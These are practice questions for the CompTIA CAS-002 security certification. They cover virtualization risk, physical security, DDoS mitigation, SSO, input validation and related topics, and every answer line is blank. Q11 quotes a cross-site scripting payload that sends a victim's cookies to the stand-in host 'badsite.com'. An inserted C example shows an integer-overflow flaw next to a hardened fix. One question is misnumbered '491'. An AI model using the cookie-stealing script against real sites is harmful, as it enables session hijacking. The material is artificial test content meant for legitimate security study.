Practice questions for the CompTIA CAS-002 exam (CompTIA Advanced Security Practitioner, CASP).

Q1. - (Topic 4) 

Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ’s hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal. Which of the following BEST describes the core concerns of the security architect? 

A. Most of company XYZ’s customers are willing to accept the risks of unauthorized disclosure and access to information by outside users. 

B. The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical platforms for regular maintenance. 

C. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer. 

D. Not all of company XYZ’s customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings. 

Answer:


Q2. - (Topic 5) 

An internal committee comprised of the facilities manager, the physical security manager, the network administrator, and a member of the executive team has been formed to address a recent breach at a company’s data center. It was discovered that during the breach, an HVAC specialist had gained entry to an area that contained server farms holding sensitive financial data. Although the HVAC specialist was there to fix a legitimate issue, the investigation concluded that security should be provided for the two entry and exit points of the server farm. Which of the following should be implemented to accomplish the recommendations of the investigation? 

A. Implement a policy that all non-employees should be escorted in the data center. 

B. Place a mantrap at the points with biometric security. 

C. Hire an HVAC person for the company, eliminating the need for external HVAC people. 

D. Implement CCTV cameras at both points. 

Answer:


Q3. - (Topic 1) 

A web services company is planning a one-time high-profile event to be hosted on the corporate website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive Officer (CEO), has requested that his security engineers put temporary preventive controls in place. Which of the following would MOST appropriately address Joe's concerns? 

A. Ensure web services hosting the event use TCP cookies and deny_hosts. 

B. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions. 

C. Contract and configure scrubbing services with third-party DDoS mitigation providers. 

D. Purchase additional bandwidth from the company’s Internet service provider. 

Answer:


Q4. - (Topic 3) 

A Physical Security Manager is ready to replace all 50 analog surveillance cameras with IP cameras with built-in web management. The Security Manager has several security guard desks on different networks that must be able to view the cameras without unauthorized people viewing the video as well. The selected IP camera vendor does not have the ability to authenticate users at the camera level. Which of the following should the Security Manager suggest to BEST secure this environment? 

A. Create an IP camera network and deploy NIPS to prevent unauthorized access. 

B. Create an IP camera network and only allow SSL access to the cameras. 

C. Create an IP camera network and deploy a proxy to authenticate users prior to accessing the cameras. 

D. Create an IP camera network and restrict access to cameras from a single management host. 

Answer:


Q5. - (Topic 5) 

Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two-factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backends to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete? 

A. They should logon to the system using the username concatenated with the 6-digit code and their original password. 

B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code. 

C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed. 

D. They should use the username format: first.lastname@company.com, together with a password and their 6-digit code. 

Answer:


Q6. - (Topic 3) 

About twice a year a switch fails in a company's network center. Under the maintenance contract, the switch would be replaced in two hours, losing the business $1,000 per hour. The cost of a spare switch is $3,000 with a 12-hour delivery time, and it would eliminate downtime costs if purchased ahead of time. The maintenance contract is $1,500 per year. 

Which of the following is true in this scenario? 

A. It is more cost-effective to eliminate the maintenance contract and purchase a replacement upon failure. 

B. It is more cost-effective to purchase a spare switch prior to an outage and eliminate the maintenance contract. 

C. It is more cost-effective to keep the maintenance contract instead of purchasing a spare switch prior to an outage. 

D. It is more cost-effective to purchase a spare switch prior to an outage and keep the maintenance contract. 

Answer:


Q7. - (Topic 5) 

As a cost-saving measure, a company has instructed the security engineering team to allow all consumer devices to access the network. They have asked for recommendations on what is needed to secure the enterprise yet offer the most flexibility in terms of controlling applications and stolen devices. Which of the following is BEST suited for the requirements? 

A. MEAP with Enterprise Appstore 

B. Enterprise Appstore with client-side VPN software 

C. MEAP with TLS 

D. MEAP with MDM 

Answer:


Q8. - (Topic 5) 

A security administrator is investigating the compromise of a software distribution website. Forensic analysis shows that several popular files are infected with malicious code. However, comparing a hash of the infected files with that of the original, non-infected files, which were restored from backup, shows that the hash is the same. Which of the following explains this? 

A. The infected files were using obfuscation techniques to evade detection by antivirus software. 

B. The infected files were specially crafted to exploit a collision in the hash function. 

C. The infected files were using heuristic techniques to evade detection by antivirus software. 

D. The infected files were specially crafted to exploit diffusion in the hash function. 

Answer:

491. - (Topic 5) 

The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? 

A. The corporate network is the only network that is audited by regulators and customers. 

B. The aggregation of employees on a corporate network makes it a more valuable target for attackers. 

C. Home networks are unknown to attackers and less likely to be targeted directly. 

D. Employees are more likely to be using personal computers for general web browsing when they are at home. 

Answer:


Q9. - (Topic 2) 

A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a user’s age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range. 

Users have reported that the website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring. Which of the following is the MOST likely situation that has occurred? 

A. The age variable stored the large number and filled up disk space which stopped the application from continuing to function. Improper error handling prevented the application from recovering. 

B. The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. Improper error handling prevented the application from recovering. 

C. Computers are able to store numbers well above “billions” in size. Therefore, the website issues are not related to the large number being input. 

D. The application has crashed because a very large integer has led to a “divide by zero”. Improper error handling prevented the application from recovering. 

Answer:
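The scenario in Q9 (a form value in the billions stored in a signed 32-bit integer before the age check) reproduced as an added example, not code from the original page. It models the vulnerable narrowing step beside a hardened parse that validates range before storing the value; the field names and the age limit of 150 are assumptions.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* wrap32() reproduces two's-complement truncation to 32 bits using only
 * well-defined 64-bit arithmetic, so the wrapped value is deterministic
 * rather than depending on compiler behaviour for out-of-range narrowing. */
static int32_t wrap32(int64_t v) {
    int64_t m = v % 4294967296LL;
    if (m < 0) m += 4294967296LL;
    if (m >= 2147483648LL) m -= 4294967296LL;
    return (int32_t)m;
}

/* Vulnerable version: parses the field without error checking and narrows
 * it into a signed 32-bit int before the range check. A value above
 * 2,147,483,647 wraps (often to a negative number). Returns 1 if "adult". */
int is_adult_vulnerable(const char *field, int32_t *stored) {
    int64_t parsed = strtoll(field, NULL, 10);
    int32_t age = wrap32(parsed);
    *stored = age;
    return age >= 18;
}

/* Hardened version: strict parse, plausibility range check before narrowing,
 * and an explicit rejection path. Returns 1 = adult, 0 = minor, -1 = rejected. */
int is_adult_hardened(const char *field, int32_t *stored) {
    char *end = NULL;
    errno = 0;
    long long parsed = strtoll(field, &end, 10);
    if (end == field || *end != '\0' || errno == ERANGE) return -1;
    if (parsed < 0 || parsed > 150) return -1;   /* assumed human age bound */
    *stored = (int32_t)parsed;
    return parsed >= 18;
}

int main(void) {
    /* Constructed sample inputs: a normal age and two values "in the billions". */
    const char *inputs[] = {"42", "3000000000", "99999999999"};
    for (int i = 0; i < 3; i++) {
        int32_t bad = 0, good = 0;
        int v = is_adult_vulnerable(inputs[i], &bad);
        int h = is_adult_hardened(inputs[i], &good);
        printf("%-12s vulnerable: stored=%d adult=%d | hardened: %d\n",
               inputs[i], bad, v, h);
    }
    return 0;
}
```

Note that "99999999999" wraps to a positive value and passes the vulnerable check while "3000000000" wraps negative and fails it, which is the unpredictable behaviour the question describes.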


Q10. - (Topic 1) 

An external penetration tester compromised one of the client organization’s authentication servers and retrieved the password database. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organization’s other systems, without impacting the integrity of any of the systems? 

A. Use the pass the hash technique 

B. Use rainbow tables to crack the passwords 

C. Use the existing access to change the password 

D. Use social engineering to obtain the actual password 

Answer:


Q11. - (Topic 1) 

A security administrator notices the following line in a server's security log: 

<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "' 

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? 

A. WAF 

B. Input validation 

C. SIEM 

D. Sandboxing 

E. DAM 

Answer:


Q12. - (Topic 5) 

During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution? 

A. Implement an IPS to block the application on the network 

B. Implement the remote application out to the rest of the servers 

C. Implement SSL VPN with SAML standards for federation 

D. Implement an ACL on the firewall with NAT for remote access 

Answer:


Q13. - (Topic 5) 

After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? 

A. Least privilege 

B. Job rotation 

C. Mandatory vacation 

D. Separation of duties 

Answer:


Q14. - (Topic 2) 

Using SSL, an administrator wishes to secure public-facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased? 

A. 0 

B. 1 

C. 3 

D. 6 

Answer:


Q15. - (Topic 1) 

A company sales manager received a memo from the company’s financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department’s change. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble? 

A. Discuss the issue with the software product's user groups 

B. Consult the company’s legal department on practices and law 

C. Contact senior finance management and provide background information 

D. Seek industry outreach for software practices and law 

Answer: